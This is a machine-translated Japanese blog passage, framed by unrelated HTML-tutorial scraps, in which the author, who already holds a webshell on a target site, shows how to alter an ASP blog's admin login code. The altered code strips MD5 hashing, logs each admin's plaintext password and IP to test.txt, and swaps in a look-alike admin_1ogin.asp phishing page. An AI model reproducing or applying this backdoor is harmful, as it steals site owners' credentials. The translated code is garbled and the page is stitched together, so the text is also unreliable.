推奨:HTMLコードライティングコレクションHTMLは、Web Languageとも呼ばれるHyperText Markup Language(HyperTextMarkuplanguage)であり、Webページで理解するために必要です。 DreamWvear、FrontPageなど、Webページを作成するための多くのツールがありますが、実際にこれらのコードを理解せずに美しいWebページを作成できます。 。 。 HTMLコンテンツは多数であるため、Webページを作成するためにコードを書く意思がある人はほとんどいません(INE効率)、それらのほとんどは使用しています
セキュリティチェックでは、実際にウェブシェルを手に入れましたが、ソーシャルワーカーに他の情報をメールアドレスに入れる必要があるため、彼の習慣を知る必要があります。
データベースはダウンロードされましたが、MD5パスワードを復号化することはできませんでした。残念ながら、彼のログイン管理者アカウントのパスワードを記録する必要があるようです!
問題を取り除くことの問題を救ってください!
このパスワードは実際には重要ですが、重要ではありません。
多くの人が同じパスワードを使用するのが好きだからです。私のようなセキュリティ検出器でさえ、必然的に同じアカウントパスワードを使用する習慣です。
まず、彼のバックグラウンドログインコードをご覧ください
<%
薄暗いログイン
login = new Adloginを設定します
login.execute
クラスアドロジン
プライベートエキュムクル
private sub class_initialize
commcls = new commonclsを設定します
excommcls.isipallow
excommcls.checkinstall
excommcls.getConfigCache(*)
End Sub
プライベートSub Class_terminate
excommcls = Nothingを設定します
End Sub
パブリックサブ実行
薄暗いアクション
アクション=リクエスト(アクション)
ケースアクションを選択します
ケースチェックロギン
CheckLogin
ケースログインアウト
ログインアウト
ケース他のケース
loginf
[選択]を終了します
End Sub
プライベートサブチェックロギン
dim adname、adpwd、checkcode
adname = excommcls.g(trim(request(adname))))
adpwd = md5(trim(request(adpwd))))
checkcode = excommcls.g(request(checkcode))
trim(checkcode)<> session(excheckcode)とapplication(sn&yscheckcode)= yes thenの場合
excommcls.showmsg検証コードが正しくありません! 、Application(SN&Blogurl)&Admin_login.asp
出口サブ
ifを終了します
trim(adname)= cstr(application(sn&adname))およびtrim(adpwd)= cstr(application(sn&adpwd))の場合
Response.Cookies(MD5(SN))(adname)= adname
Response.Cookies(MD5(SN))(ADPWD)= ADPWD
セッション(adlogin)= md5(sn)
excommcls.getConfigCache(*)
excommcls.getClassCache()
Response.Redirect(Application(SN&Blogurl)&Admin_index.asp)
それ以外
excommcls.showmsgアカウントまたはパスワードは間違っています
ifを終了します
End Sub
プライベートサブログインアウト
Response.Cookies(MD5(SN))(ADNAME)=
Response.Cookies(MD5(SN))(ADPWD)=
session.abandon()
excommcls.showmsgは、Application(sn&blogurl)&index.aspを正常にログアウトしました
End Sub
プライベートサブログニフ
%>
次のコードを見てください
adname = excommcls.g(trim(request(adname))))
adpwd = md5(trim(request(adpwd))))
---意味は非常に単純なので、ここで明示的に説明しません。主にMD5に依存します。 MD5を使用してパスワードが暗号化されている場合、記録したパスワードは役に立たず、それでもMD5です。それで
だから私は釣りの方法を考えました。元のログインインターフェイスはです
プライベートサブチェックロギン
dim adname、adpwd、checkcode、strlogtext、ip、ff
adname = excommcls.g(trim(request(adname))))
adpwd =(trim(request(adpwd)))
checkcode = excommcls.g(request(checkcode))
strlogfile = test.txt
ip = request(ip)
strlogtext = strlogtext&adname&----&adpwd&----- ip:&ip&(remote_host)
f = server.createObject(scripting.filesystemObject)を設定します
ff = f.opentextfile(server.mapath(。)&/&/&strlogfile、8、true、0)を設定
ff.writeline(chr(13)+chr(10)&strlogtext)
ff.close
FF =何も設定しません
f =何も設定しません
trim(checkcode)<> session(excheckcode)とapplication(sn&yscheckcode)= yes thenの場合
excommcls.showmsg検証コードが正しくありません! 、Application(SN&Blogurl)&Admin_1ogin.asp
出口サブ
ifを終了します
trim(adname)= cstr(application(sn&adname))およびtrim(adpwd)= cstr(application(sn&adpwd))の場合
Response.Cookies(MD5(SN))(adname)= adname
Response.Cookies((SN))(ADPWD)= ADPWD
セッション(adlogin)= md5(sn)
excommcls.getConfigCache(*)
excommcls.getClassCache()
Response.redirect(application(sn&blogurl)&admin_1ogin.asp)
それ以外
excommcls.showmsgアカウントまたはパスワードは間違っています
ifを終了します
End Sub
見たかどうかにかかわらず、
a =元のログインページは、フィッシングページに置き換えられました
b =元のログインページ(admin_login.asp)はadmin_1ogin.aspに変更されます
なぜ?
オリジナル:adpwd = md5(trim(request(adpwd))))
Response.Cookies(MD5(SN))(ADPWD)= ADPWD
改訂
adpwd =(trim(request(adpwd)))
Response.Cookies((SN))(ADPWD)= ADPWD
MD5を削除します。 。この紛らわしい方法は長い間使用されてきました! 。 。
技術的なコンテンツはありません。私を笑わないでください!パスワードはtest.txtに記録されます
共有:ヘッド要素のハイライトHTMLドキュメントは、ヘッド(テーマ部分、一般的に見えないもの)とボディ(ボディパート、ブラウザに表示可能)の2つの部分で構成されています。 FrontPageやDreamWeaver(DW)などのビジュアルWebエディターの人気により、HTMLを理解せずにプロのWebページを作成することはもはや夢ではありません。ただし、これらのホームページ作成ツールは使用できません